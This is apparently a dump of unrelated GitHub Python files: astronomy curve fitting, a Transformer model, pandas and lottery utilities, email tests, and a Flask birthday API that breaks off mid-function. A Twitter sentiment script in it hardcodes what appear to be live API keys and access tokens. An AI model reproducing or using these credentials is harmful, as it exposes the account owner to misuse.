mask_tail] *= 2\n\n # use the Levenberg-Marquardt algorithm to fit the data with the model\n fit = LevMarLSQFitter()\n fit_result_lev = fit(func, waves, exts, weights=weights, maxiter=10000)\n\n # set up the backend to save the samples for the emcee runs\n emcee_samples_file = path + \"Fitting_results/\" + starpair + \"_emcee_samples.h5\"\n\n # do the fitting again, with MCMC, using the results from the first fitting as input\n fit2 = EmceeFitter(nsteps=10000, burnfrac=0.1, save_samples=emcee_samples_file)\n\n # add parameter bounds\n for param in fit_result_lev.param_names:\n if \"amplitude\" in param:\n getattr(fit_result_lev, param).bounds = (0, 2)\n elif \"alpha\" in param:\n getattr(fit_result_lev, param).bounds = (0, 4)\n elif \"Av\" in param:\n getattr(fit_result_lev, param).bounds = (0, 10)\n\n fit_result_mcmc = fit2(fit_result_lev, waves, exts, weights=weights)\n\n # create standard MCMC plots\n fit2.plot_emcee_results(\n fit_result_mcmc, filebase=path + \"Fitting_results/\" + starpair\n )\n\n # choose the fit result to save\n fit_result = fit_result_mcmc\n # fit_result = fit_result_lev\n print(fit_result)\n\n # determine the wavelengths at which to evaluate and save the fitted model curve: all SpeX wavelengths, sorted from short to long (to avoid problems with overlap between SXD and LXD), and shortest and longest wavelength should have data\n if \"SpeX_LXD\" not in extdata.waves.keys():\n full_waves = extdata.waves[\"SpeX_SXD\"].value\n full_npts = extdata.npts[\"SpeX_SXD\"]\n else:\n full_waves = np.concatenate(\n (extdata.waves[\"SpeX_SXD\"].value, extdata.waves[\"SpeX_LXD\"].value)\n )\n full_npts = np.concatenate((extdata.npts[\"SpeX_SXD\"], extdata.npts[\"SpeX_LXD\"]))\n # sort the wavelengths\n indxs_sort = np.argsort(full_waves)\n full_waves = full_waves[indxs_sort]\n full_npts = full_npts[indxs_sort]\n # cut the wavelength region\n indxs = np.logical_and(full_waves >= np.min(waves), full_waves <= np.max(waves))\n full_waves = full_waves[indxs]\n full_npts = full_npts[indxs]\n\n # calculate the residuals and put them in an array of the same length as \"full_waves\" for plotting\n residuals = exts - fit_result(waves)\n full_res = np.full_like(full_npts, np.nan)\n if exclude:\n mask = np.full_like(full_waves, False, dtype=bool)\n for region in exclude:\n mask += (full_waves > region[0]) & (full_waves < region[1])\n full_res[(full_npts > 0) * ~mask] = residuals\n\n else:\n full_res[(full_npts > 0)] = residuals\n\n # bootstrap to get more realistic uncertainties on the parameter results\n if bootstrap:\n red_star = StarData(extdata.red_file, path=path, use_corfac=True)\n comp_star = StarData(extdata.comp_file, path=path, use_corfac=True)\n red_V_unc = red_star.data[\"BAND\"].get_band_mag(\"V\")[1]\n comp_V_unc = comp_star.data[\"BAND\"].get_band_mag(\"V\")[1]\n unc_V = np.sqrt(red_V_unc ** 2 + comp_V_unc ** 2)\n fit_result_mcmc_low = fit2(fit_result_lev, waves, exts - unc_V, weights=weights)\n fit_result_mcmc_high = fit2(\n fit_result_lev, waves, exts + unc_V, weights=weights\n )\n\n # save the fitting results to the fits file\n if dense:\n functype += \"_\" + profile\n extdata.model[\"type\"] = functype + \"_\" + extdata.type\n extdata.model[\"waves\"] = full_waves\n extdata.model[\"exts\"] = fit_result(full_waves)\n extdata.model[\"residuals\"] = full_res\n extdata.model[\"chi2\"] = np.sum((residuals / exts_unc) ** 2)\n print(\"Chi2\", extdata.model[\"chi2\"])\n extdata.model[\"params\"] = []\n for param in fit_result.param_names:\n # update the uncertainties when bootstrapping\n if bootstrap:\n min_val = min(\n getattr(fit_result_mcmc, param).value,\n getattr(fit_result_mcmc_low, param).value,\n getattr(fit_result_mcmc_high, param).value,\n )\n max_val = max(\n getattr(fit_result_mcmc, param).value,\n getattr(fit_result_mcmc_low, param).value,\n getattr(fit_result_mcmc_high, param).value,\n )\n sys_unc = (max_val - min_val) / 2\n getattr(fit_result, param).unc_minus = np.sqrt(\n getattr(fit_result, param).unc_minus ** 2 + sys_unc ** 2\n )\n getattr(fit_result, param).unc_plus = np.sqrt(\n getattr(fit_result, param).unc_plus ** 2 + sys_unc ** 2\n )\n\n extdata.model[\"params\"].append(getattr(fit_result, param))\n\n # save the column information (A(V), E(B-V) and R(V))\n if \"Av\" in param:\n extdata.columns[\"AV\"] = (\n getattr(fit_result, param).value,\n getattr(fit_result, param).unc_minus,\n getattr(fit_result, param).unc_plus,\n )\n # calculate the distrubtion of R(V) and 1/R(V) from the distributions of A(V) and E(B-V)\n nsamples = getattr(fit_result, param).posterior.n_samples\n av_dist = unc.normal(\n extdata.columns[\"AV\"][0],\n std=(extdata.columns[\"AV\"][1] + extdata.columns[\"AV\"][2]) / 2,\n n_samples=nsamples,\n )\n b_indx = np.abs(extdata.waves[\"BAND\"] - 0.438 * u.micron).argmin()\n ebv_dist = unc.normal(\n extdata.exts[\"BAND\"][b_indx],\n std=extdata.uncs[\"BAND\"][b_indx],\n n_samples=nsamples,\n )\n ebv_per = ebv_dist.pdf_percentiles([16.0, 50.0, 84.0])\n extdata.columns[\"EBV\"] = (\n ebv_per[1],\n ebv_per[1] - ebv_per[0],\n ebv_per[2] - ebv_per[1],\n )\n rv_dist = av_dist / ebv_dist\n rv_per = rv_dist.pdf_percentiles([16.0, 50.0, 84.0])\n extdata.columns[\"RV\"] = (\n rv_per[1],\n rv_per[1] - rv_per[0],\n rv_per[2] - rv_per[1],\n )\n inv_rv_dist = ebv_dist / av_dist\n inv_rv_per = inv_rv_dist.pdf_percentiles([16.0, 50.0, 84.0])\n extdata.columns[\"IRV\"] = (\n inv_rv_per[1],\n inv_rv_per[1] - inv_rv_per[0],\n inv_rv_per[2] - inv_rv_per[1],\n )\n print(extdata.columns)\n\n # save the fits file\n extdata.save(filename)\n\n # print information about the ice feature\n if fixed:\n print(\n \"Ice feature strength: \",\n extdata.model[\"params\"][3].value,\n extdata.model[\"params\"][3].unc_minus,\n extdata.model[\"params\"][3].unc_plus,\n )\n\n\nif __name__ == \"__main__\":\n path = \"/Users/mdecleir/Documents/NIR_ext/Data/\"\n fit_spex_ext(\"HD283809_HD003360\", path)\n","repo_name":"mdecleir/spex_nir_extinction","sub_path":"fit_spex_ext.py","file_name":"fit_spex_ext.py","file_ext":"py","file_size_in_byte":23139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"73054192581","text":"import math, copy\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom scripts.TransLinsUtils import *\n\n\nclass TransformerMultiHeadAttention(nn.Module):\n def __init__(self, num_heads, emb_dim, dim_k = None, dropout = 0.1):\n super().__init__()\n \n self.emb_dim = emb_dim\n self.dim_k = dim_k if dim_k else emb_dim // num_heads\n self.num_heads = num_heads\n self.q_linear = nn.Linear(emb_dim,self.dim_k*num_heads)\n self.k_linear = nn.Linear(emb_dim,self.dim_k*num_heads)\n self.v_linear = nn.Linear(emb_dim,self.dim_k*num_heads)\n\n self.dropout = nn.Dropout(dropout)\n self.out = nn.Linear(self.dim_k*num_heads,emb_dim)\n \n def attention(self, q, k, v, dim_k, mask=None, dropout=None, explain=False):\n k = k.transpose(-2, -1)\n if explain: print('q, k', q.shape, k.shape)\n # matrix multiplication is done using the last two dimensions\n # (batch_size,num_heads,q_seq_len,dim_k)X(batch_size,num_heads,dim_k,k_seq_len)\n #(batch_size,num_heads,q_seq_len,k_seq_len)\n scores = torch.matmul(q, k) / math.sqrt(dim_k) \n if explain: print('scores.shape', scores.shape)\n if mask is not None:\n mask = mask.unsqueeze(1)\n if explain: print('mask.shape', mask.shape)\n scores = scores.masked_fill(mask == 0, -1e9) \n softscores = F.softmax(scores, dim=-1)\n if dropout is not None: softscores = dropout(softscores)\n \n #(batch_size,num_heads,seq_len,seq_len)X(batch_size,num_heads,seq_len,dim_k)\n output = torch.matmul(softscores, v)\n return output, scores #=(batch_size,num_heads,seq_len,dim_k)\n \n def forward(self, q, k, v, mask=None, explain=False):\n '''\n inputs:\n q has shape (batch size, q_sequence length, embedding dimensions)\n k,v are shape (batch size, kv_sequence length, embedding dimensions)\n source_mask of shape (batch size, 1, kv_sequence length)\n outputs: sequence of vectors, re-represented using attention\n shape (batch size, q_sequence length, embedding dimensions)\n use:\n The encoder layer places the same source vector sequence into q,k,v \n and source_mask into mask.\n The decoder layer uses this twice, once with decoder inputs as q,k,v \n and target mask as mask. then with decoder inputs as q, encoder outputs\n as k, v and source mask as mask\n '''\n # k,q,v are each shape (batch size, sequence length, dim_k * num_heads)\n batch_size = q.size(0)\n q = self.q_linear(q)\n k = self.k_linear(k)\n v = self.v_linear(v)\n if explain: print(\"(batch size, sequence length, dim_k * num_heads)\", k.shape)\n # k,q,v are each shape (batch size, sequence length, num_heads, dim_k)\n k = k.view(batch_size,-1,self.num_heads,self.dim_k)\n q = q.view(batch_size,-1,self.num_heads,self.dim_k)\n v = v.view(batch_size,-1,self.num_heads,self.dim_k)\n # transpose to shape (batch_size, num_heads, sequence length, dim_k)\n k = k.transpose(1,2)\n q = q.transpose(1,2)\n v = v.transpose(1,2)\n if explain: print(\"(batch_size,num_heads,seq_length,dim_k)\",k.shape)\n # calculate attention using function we will define next\n attn, scores = self.attention(q, k, v, self.dim_k, mask, self.dropout, explain)\n if explain: print(\"attn(batch_size,num_heads,seq_length,dim_k)\", attn.shape)\n # concatenate heads and \n concat=attn.transpose(1,2).contiguous().view(batch_size,-1,self.dim_k*self.num_heads)\n if explain: print(\"concat.shape\", concat.shape)\n # put through final linear layer\n output = self.out(concat)\n if explain: print(\"TransformerMultiHeadAttention output.shape\", output.shape)\n return output, scores\n\nclass TransformerEncoderLayer(nn.Module):\n def __init__(self, emb_dim, heads, dropout=0.1):\n super().__init__()\n self.norm_1 = Norm(emb_dim)\n self.dropout_1 = nn.Dropout(dropout)\n self.attn = TransformerMultiHeadAttention(heads, emb_dim, dropout=dropout)\n self.norm_2 = Norm(emb_dim)\n self.ff = FeedForward(emb_dim, dropout=dropout)\n self.dropout_2 = nn.Dropout(dropout)\n \n def forward(self, vector_sequence, mask):\n '''\n input:\n vector_sequence of shape (batch size, sequence length, embedding dimensions)\n source_mask (mask over input sequence) of shape (batch size, 1, sequence length)\n output: sequence of vectors after embedding, postional encoding, attention and normalization\n shape (batch size, sequence length, embedding dimensions)\n '''\n x2 = self.norm_1(vector_sequence)\n x2_attn, x2_scores = self.attn(x2,x2,x2,mask)\n vector_sequence = vector_sequence + self.dropout_1(x2_attn)\n x2 = self.norm_2(vector_sequence)\n vector_sequence = vector_sequence + self.dropout_2(self.ff(x2))\n return vector_sequence\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, vocab_size, emb_dim, n_layers, heads, dropout):\n super().__init__()\n self.n_layers = n_layers\n self.embed = Embedder(vocab_size, emb_dim)\n self.pe = PositionalEncoder(emb_dim, dropout=dropout)\n self.layers = get_clones(TransformerEncoderLayer(emb_dim, heads, dropout), n_layers)\n self.norm = Norm(emb_dim)\n def forward(self, source_sequence, source_mask):\n '''\n input:\n source_sequence (sequence of source tokens) of shape (batch size, sequence length)\n source_mask (mask over input sequence) of shape (batch size, 1, sequence length)\n output: sequence of vectors after embedding, postional encoding, attention and normalization\n shape (batch size, sequence length, embedding dimensions)\n '''\n vector_sequence = self.embed(source_sequence)\n vector_sequence = self.pe(vector_sequence)\n for i in range(self.n_layers):\n vector_sequence = self.layers[i](vector_sequence, source_mask)\n vector_sequence = self.norm(vector_sequence)\n return vector_sequence\n\nclass TransformerDecoderLayer(nn.Module):\n\n def __init__(self, emb_dim, heads, dropout=0.1):\n super().__init__()\n self.norm_1 = Norm(emb_dim)\n self.norm_2 = Norm(emb_dim)\n self.norm_3 = Norm(emb_dim)\n \n self.dropout_1 = nn.Dropout(dropout)\n self.dropout_2 = nn.Dropout(dropout)\n self.dropout_3 = nn.Dropout(dropout)\n \n self.attn_1 = TransformerMultiHeadAttention(heads, emb_dim, dropout=dropout)\n self.attn_2 = TransformerMultiHeadAttention(heads, emb_dim, dropout=dropout)\n self.ff = FeedForward(emb_dim, dropout=dropout)\n\n def forward(self, de_out, de_mask, en_out, en_mask):\n '''\n inputs:\n de_out - decoder ouputs so far (batch size, output sequence length, embedding dimensions)\n de_mask (batch size, output sequence length, output sequence length)\n en_out - encoder output (batch size, input sequence length, embedding dimensions)\n en_mask (batch size, 1, input sequence length)\n ouputs:\n de_out (next decoder output) (batch size, output sequence length, embedding dimensions)\n '''\n de_nrm = self.norm_1(de_out)\n #Self Attention \n self_attn, self_scores = self.attn_1(de_nrm, de_nrm, de_nrm, de_mask)\n de_out = de_out + self.dropout_1(self_attn)\n de_nrm = self.norm_2(de_out)\n #DecoderEncoder Attention\n en_attn, en_scores = self.attn_2(de_nrm, en_out, en_out, en_mask) \n de_out = de_out + self.dropout_2(en_attn)\n de_nrm = self.norm_3(de_out)\n de_out = de_out + self.dropout_3(self.ff(de_nrm))\n return de_out\n\nclass TransformerDecoder(nn.Module):\n '''\n If your target sequence is `see` `ya` and you want to train on the entire \n sequence against the target, you would use `` `see` `ya`\n as the de_out (decoder ouputs so far) and compare the \n output de_out (next decoder output) `see` `ya` `` \n as the target in the loss function. The inclusion of the ``\n for the (decoder ouputs so far) and `` for the \n '''\n def __init__(self, vocab_size, emb_dim, n_layers, heads, dropout):\n super().__init__()\n self.n_layers = n_layers\n self.embed = Embedder(vocab_size, emb_dim)\n self.pe = PositionalEncoder(emb_dim, dropout=dropout)\n self.layers = get_clones(TransformerDecoderLayer(emb_dim, heads, dropout), n_layers)\n self.norm = Norm(emb_dim)\n def forward(self, de_toks, de_mask, en_vecs, en_mask):\n '''\n inputs:\n de_toks - decoder ouputs so far (batch size, output sequence length)\n de_mask (batch size, output sequence length, output sequence length)\n en_vecs - encoder output (batch size, input sequence length, embedding dimensions)\n en_mask (batch size, 1, input sequence length)\n outputs:\n de_vecs - next decoder output (batch size, output sequence length, embedding dimensions)\n\n '''\n x = self.embed(de_toks)\n x = self.pe(x)\n for i in range(self.n_layers):\n x = self.layers[i](x, de_mask, en_vecs, en_mask)\n return self.norm(x)\n\nclass Transformer(nn.Module):\n def __init__(self, in_vocab_size, out_vocab_size, emb_dim, n_layers, heads, dropout):\n super().__init__()\n self.encoder = TransformerEncoder(in_vocab_size, emb_dim, n_layers, heads, dropout)\n self.decoder = TransformerDecoder(out_vocab_size, emb_dim, n_layers, heads, dropout)\n self.out = nn.Linear(emb_dim, out_vocab_size)\n def forward(self, src_seq, src_mask, trg_seq, trg_mask):\n e_output = self.encoder(src_seq, src_mask)\n d_output = self.decoder(trg_seq, trg_mask, e_output, src_mask)\n output = self.out(d_output)\n return output\n\n","repo_name":"Alaqian/Linformer-Based-Conversational-Chatbot","sub_path":"scripts/Transformer.py","file_name":"Transformer.py","file_ext":"py","file_size_in_byte":10121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"73678574661","text":"import pandas as pd\r\nimport os\r\n\r\nos.chdir(\"C:\\\\Users\\\\arman\\\\OneDrive\\\\Desktop\\\\2020\\DataCamp\\\\15 Merging_Data_Frames_Pandas\\\\01_Preparing_Data\\\\Summer Olympic medals\")\r\nos.getcwd()\r\nos.listdir(\"C:\\\\Users\\\\arman\\\\OneDrive\\\\Desktop\\\\2020\\DataCamp\\\\15 Merging_Data_Frames_Pandas\\\\01_Preparing_Data\\\\Summer Olympic medals\")\r\n\r\n# Create the list of file names: filenames\r\nfilenames = ['Gold.csv', 'Silver.csv', 'Bronze.csv']\r\n\r\n# Create the list of three DataFrames: dataframes\r\ndataframes = []\r\nfor filename in filenames:\r\n dataframes.append(pd.read_csv(filename))\r\n\r\n# Print top 5 rows of 1st DataFrame in dataframes\r\nprint(dataframes[0].head())\r\nprint(dataframes[1].head())\r\nprint(dataframes[2].head())\r\n","repo_name":"ArmandoReyesRepo/PythonCode","sub_path":"15 Merging_Data_Frames_Pandas/01_Preparing_Data/02_Reading_Loop.py","file_name":"02_Reading_Loop.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"70084662661","text":"from textblob import TextBlob\r\nimport sys, tweepy\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef percentage(part,whole):\r\n return 100*float(part)/float(whole)\r\n\r\nconsumerKey=\"Kx05pI2ZHtRkQs6LHsLYOkeRK\"\r\nconsumerSecret=\"grY1yujbtYBRwfspIS8swiFoXUlTrBgr5I4IwcQhBbWmyFgYPM\"\r\naccessToken=\"2530152451-OO6vRCLjNXQIaHyelo1TdFhSlI8YpBzpUX91RAa\"\r\naccessTokenSecret=\"jscWVipPNASXspdVbwNxiRY1ZpiAw3syUi6agB4kcmr1m\"\r\n\r\n\r\nauth=tweepy.OAuthHandler(consumer_key=consumerKey,consumer_secret=consumerSecret)\r\nauth.set_access_token(accessToken,accessTokenSecret)\r\napi=tweepy.API(auth)\r\n\r\nsearchTerm=input(\"Enter hashtag to search:\")\r\nnumberofSeachTerms=int(input(\"How many tweets to analyze?\"))\r\n\r\ntweets=tweepy.Cursor(api.search, q=searchTerm, lang=\"English\").items(numberofSeachTerms)\r\n\r\n\r\npositive=0.00\r\nnegative=0.00\r\nmixed=0.00\r\npolarity=0.00\r\n\r\nfor tweet in tweets:\r\n print(tweet.text)\r\n analysis=TextBlob(tweet.text)\r\n polarity+=analysis.sentiment.polarity\r\n if(analysis.sentiment.polarity==0.00):\r\n mixed+=1\r\n elif(analysis.sentiment.polarity<0.00):\r\n negative+=1\r\n elif(analysis.sentiment.polarity>0.00):\r\n positive+=1\r\n\r\npositive=percentage(positive,numberofSeachTerms)\r\nnegative=percentage(negative,numberofSeachTerms)\r\nmixed=percentage(mixed,numberofSeachTerms)\r\npolarity=percentage(polarity,numberofSeachTerms)\r\n\r\npositive=format(positive,'.2f')\r\nnegative=format(negative,'.2f')\r\nmixed=format(mixed,'.2f')\r\n\r\nprint('How people are reacting on'+searchTerm)\r\n\r\nif(polarity==0):\r\n print(\"Mixed Views\")\r\nelif(polarity<0.00):\r\n print(\"Negatively\")\r\nelif(polarity>0.00):\r\n print(\"Positively\")\r\n\r\nlabels=[\"Positive[\"+str(positive)+\"%]\",\"Mixed Views[\"+str(mixed)+\"%]\",\"Negative[\"+str(negative)+\"%]\"]\r\nsizes=[positive,mixed,negative]\r\ncolors=[\"pink\",\"lightgreen\",\"lightblue\"]\r\npatches,texts=plt.pie(sizes,colors=colors,startangle=90)\r\nplt.legend(patches,labels,loc=\"best\")\r\nplt.title(\"People are reacting on\"+searchTerm)\r\nplt.axis(\"equal\")\r\nplt.tight_layout()\r\nplt.show()\r\n","repo_name":"thatgem/SentimentAnalyzer2018","sub_path":"layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"39428034144","text":"#Polymorphism\n #1.Duck Typing\n #2.Operator Overloading\n #3.Merhod Overloading\n #4.Method Overiding\n\na = 5\nb = 6\nprint(a+b) #11\nprint(int.__add__(a,b)) #11\n\n\na = '5'\nb = '6'\nprint(a+b) #56\nprint(str.__add__(a,b)) #56\n\nprint(\"-----------------------\")\n\nclass Student:\n def __init__(self,m1,m2):\n self.m1=m1\n self.m2=m2\n\n def __add__(self,other): #overload the + operator\n m1=self.m1 + other.m1\n m2=self.m2 + other.m2\n s3=Student(m1,m2)\n return s3\n \n def __gt__(self,other): #greater than\n r1=self.m1+self.m2\n r2=other.m1+other.m2\n if r1>r2:\n return True\n else:\n return False\n \n def __str__(self):\n return '{} {} '.format(self.m1, self.m2) \n\n\ns1=Student(75,80) \ns2=Student(25,65)\n\ns3=s1+s2\nprint(s3.m1) #100\n\nif s1>s2:\n print(\"s1 Win\") #s1 Win\nelse:\n print(\"s2 Win\")\n\nprint(\"---------------------\")\n\n#print(s1) #<__main__.Student object at 0x0307E640>\n#print(s1.__str__()) #<__main__.Student object at 0x0307E640>\n\nprint(s1) #75 80 Operator Overloading","repo_name":"DaminduSandaruwan/LearnPython","sub_path":"OOPs/Polymorphism/Operator Overloading.py","file_name":"Operator Overloading.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"8"} +{"seq_id":"31950576677","text":"import pandas as pd\n\nclass Filtro(object):\n def __init__(self, ativo):\n self.ativo = ativo\n\n def apply(self, df):\n raise NotImplementedError('Subclass must implement abstract method')\n\nclass FiltroResultadosAnteriores(Filtro):\n def __init__(self, dfFiltrado, dfResultados, ativo=True):\n super().__init__(ativo)\n self.dfFiltrado = dfFiltrado\n self.dfResultados = dfResultados\n\n def apply(self, df):\n indice = pd.DataFrame(self.dfFiltrado['CC'] - 1, columns=['CC']) # Convertemos a série para um DataFrame\n dfRAnteriores = pd.merge(indice, self.dfResultados, on='CC', how='inner') # Realizamos o merge com base na coluna 'CC'\n # dfRAnteriores['CCOriginal'] = dfRAnteriores['CC']+1\n dfRAnteriores = dfRAnteriores.assign(CCOriginal = dfRAnteriores['CC']+1)\n return dfRAnteriores\n\nclass FiltroQuaseTresPorLinha(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df):\n if self.ativo:\n def is_quasi_three_per_line(pattern):\n # Contando o número de ocorrências de cada valor\n counts = {i: pattern.count(i) for i in pattern}\n # Verificando se o padrão atende ao critério\n return counts.get(3, 0) == 3 and counts.get(2, 0) == 1 and counts.get(4, 0) == 1\n\n # Filtrando o DataFrame\n return df[df['countL'].apply(is_quasi_three_per_line)]\n else:\n return df\n\nclass FiltroTresPorLinha(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df):\n if self.ativo:\n # implementa a lógica de 3 números por linha\n rows = []\n for i, row in df.iterrows():\n # numbers = sorted(row[2:17])\n numbers = {row[f'B{j}'] for j in range(1, 16)}\n lines = [0]*5\n for num in numbers:\n lines[(num-1)//5] += 1\n if all(line == 3 for line in lines):\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\n\nclass FiltroDezenasParesImpares(Filtro):\n def __init__(self, dezenas_pares, dezenas_impares, ativo=True):\n super().__init__(ativo)\n self.dezenas_pares = dezenas_pares\n self.dezenas_impares = dezenas_impares\n\n def apply(self, df):\n if self.ativo:\n # implementa a lógica de dezenas pares e ímpares\n rows = []\n for i, row in df.iterrows():\n #numbers = row[2:17]\n numbers = {row[f'B{j}'] for j in range(1, 16)}\n par_count = sum(1 for num in numbers if num % 2 == 0)\n impar_count = sum(1 for num in numbers if num % 2 != 0)\n if par_count == self.dezenas_pares and impar_count == self.dezenas_impares:\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\nclass FiltroDezenaSemColunasSequenciasRepetidas(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df):\n if self.ativo:\n rows = []\n for i, row in df.iterrows():\n if row['countCRE'] == 0:\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\nclass FiltroApostasN(Filtro):\n def __init__(self, ativo=True):\n super().__init__(ativo)\n\n def apply(self, df, num_rows, seed):\n if self.ativo:\n if len(df) < num_rows:\n raise ValueError(f\"The DataFrame only has {len(df)} rows, which is less than {num_rows}.\")\n else:\n return df.sample(n=num_rows, random_state=seed)\n else:\n return df\n\nclass FiltroFrequenciaDezenas(Filtro):\n def __init__(self, g1_count, g2_count, g3_count, g4_count, ativo=True):\n super().__init__(ativo)\n self.g1_count = g1_count\n self.g2_count = g2_count\n self.g3_count = g3_count\n self.g4_count = g4_count\n\n def apply(self, df):\n if self.ativo:\n # implementa a lógica de contagem de frequência de dezenas\n rows = []\n for i, row in df.iterrows():\n if (len(row['G1']) == self.g1_count and\n len(row['G2']) == self.g2_count and\n len(row['G3']) == self.g3_count and\n len(row['G4']) == self.g4_count):\n rows.append(row)\n return pd.DataFrame(rows, columns=df.columns)\n else:\n return df\n\nclass FiltraApostasNAH(Filtro):\n def __init__(self, ultimo, n_count, a_count, h_count, ativo=True):\n super().__init__(ativo)\n self.ultimo_resultado = ultimo\n self.n = n_count\n self.a = a_count\n self.h = h_count\n #self.apostas_geradas = dfApostas\n\n def apply(self, dfApostas):\n # implementa a lógica de dezenas pares e ímpares\n rows = []\n countN = 0\n countA = 0\n countH = 0\n for i, row in dfApostas.iterrows():\n numbers = {row[f'B{j}'] for j in range(1, 16)}\n countN = sum(1 for num in numbers if num in self.ultimo_resultado.NS_to_N)\n countA = sum(1 for num in numbers if num in self.ultimo_resultado.N_to_A)\n countH = sum(1 for num in numbers if num in self.ultimo_resultado.AH_to_H)\n\n if countN == self.n and countA == self.a and countH == self.h:\n rows.append(row)\n return pd.DataFrame(rows, columns=dfApostas.columns)\n\n\nclass ResultadosFiltrados(object):\n def __init__(self, dataframe, filtros):\n self.df = dataframe\n self.filtros = filtros\n\n def get_filtered_results(self):\n df_filtrado = self.df\n for filtro in self.filtros:\n df_filtrado = filtro.apply(df_filtrado)\n return df_filtrado\n","repo_name":"cesarac666/loterias","sub_path":"imports/allFiltersV3.py","file_name":"allFiltersV3.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"21926202984","text":"# dependency_graph.py\n#\n# This script walks over a C project and pretty prints all the includes per\n# .c/.h file.\nimport os\nimport sys\nimport re\n\nproject_path = sys.argv[1]\n\n# Excludes the last '/', because it leads to duplicate '/'s for files in the\n# provided directory.\nif project_path[-1].endswith(r'/'):\n project_path = project_path[:-1]\n\nstack = list()\nindent = 0\n\nfor root, _, files in os.walk(project_path, followlinks=False):\n for filename in files:\n if filename.endswith(r'.c') or filename.endswith(r'.h'):\n absolute_path = root + r'/' + filename\n # latin-1 = iso-8859-1\n with open(absolute_path, r'rt', encoding=r'latin-1') as source:\n print(source.name + r':')\n\n indent = 1\n stack = []\n\n for line in source:\n include_match = re.findall(r'#include [<\"](.+.h(?:pp)?)[>\"]', line, re.ASCII)\n if include_match:\n print(r' '*indent + include_match[0])\n\n identifier_match = re.search(r'#ifdef (\\w+)', line, re.ASCII)\n if identifier_match:\n im = identifier_match.group(1)\n stack.append(im)\n print(r' '*indent + im)\n indent += 1\n elif line.startswith(r'#endif'):\n try:\n stack.pop()\n except IndexError:\n continue\n\n indent -= 1\n","repo_name":"aakordas/scripts","sub_path":"dependency_graph.py","file_name":"dependency_graph.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"27272193147","text":"from database import *\nimport unittest\nimport sqlite3\nimport os\n\neml = \"2023-10-05/test1.eml\"\n\nclass TestEmailFunctions(unittest.TestCase):\n\n def setUp(self):\n # Initialize a temporary test database\n self.conn = sqlite3.connect(\":memory:\") # Use an in-memory database for testing\n self.cursor = self.conn.cursor()\n self.create_database_table()\n\n def tearDown(self):\n # Close the database connection\n self.conn.close()\n\n def create_database_table(self):\n # Create the same table as in your main code\n self.cursor.execute('''\n CREATE TABLE emails (\n email_address TEXT PRIMARY KEY,\n to_address TEXT,\n from_address TEXT,\n ip_address TEXT,\n domain_name TEXT,\n email_body TEXT,\n spf_result TEXT\n dkim_result TEXT\n )\n ''')\n self.conn.commit()\n\n def test_extract_email_details(self):\n # Write test cases for extract_email_details function\n # You can use temporary EML files or mock data\n # Use self.assertEqual or self.assertTrue to check the expected output\n from_address, to_address, subject, _ = extract_email_details(eml)\n #print(f\"from_address: {from_address}\")\n # print(f\"to_address: {to_address}\")\n #print(f\"subject: {subject}\")\n\n\n\n def test_extract_spf_result(self):\n # Write test cases for extract_spf_result function\n # You can use temporary EML files or mock data\n # Use self.assertEqual or self.assertTrue to check the expected output\n spf_result = extract_spf_result(eml)\n\n def test_database_operations(self):\n # Write test cases for database operations\n # You can use the database connection created in setUp\n # Insert data into the database and then retrieve it to check if it matches\n # Use self.assertEqual or self.assertTrue to check the expected output\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fazilraja/email-study","sub_path":"test_eml.py","file_name":"test_eml.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"7062836638","text":"from flask import Flask,request, jsonify\nfrom tinydb import TinyDB, Query\nimport datetime as dt\nfrom flask_restplus import Resource, Api\n\napp = Flask(__name__)\napi = Api(app)\n\n#Saving to DB\ndb=TinyDB('./db.json')\nUser = Query()\n\n#Current Date\ntoday = dt.date.today()\n\n@app.route('/', methods=['GET'])\ndef home():\n return ('''\n

Version : 1.1

\n

Hello World Application

DevOps Engineer Test

\n A Simple Hello World application that exposes GET and PUT api call.\n
Hint: This is a RESTful web service! Append a username to the URL after hello (for example: /hello/mayank -d { \"dateOfBirth\" : \"1988-12-01\" }) with data.
\\n'''\n )\n\n@app.route('/hello/', methods=['GET', 'PUT'])\ndef index(userName):\n try:\n if request.method == 'PUT':\n if request.headers['Content-Type'] == 'application/json':\n data = request.get_json()\n db.upsert({'name': userName, \"dob\": data['dateOfBirth']}, User.name == userName)\n return ('', 204)\n else:\n return (\"Data MUST be in JSON Type\")\n if request.method == 'GET':\n searchValue = db.search(User.name == userName)\n newValue = searchValue[0]\n birth = dt.datetime.strptime(newValue['dob'], '%Y-%m-%d')\n if ( today.month == birth.month and today.day >= birth.day or today.month > birth.month ):\n nextBirthYear = today.year + 1\n else: \n nextBirthYear = today.year\n nextBirthday = dt.date(nextBirthYear, birth.month, birth.day)\n diff = nextBirthday - today\n if ( today == birth.date() ):\n return jsonify({\"message\" : f\"Hello, {userName}! Happy Birthday\"})\n else:\n # diff = nextBirthday - today\n return 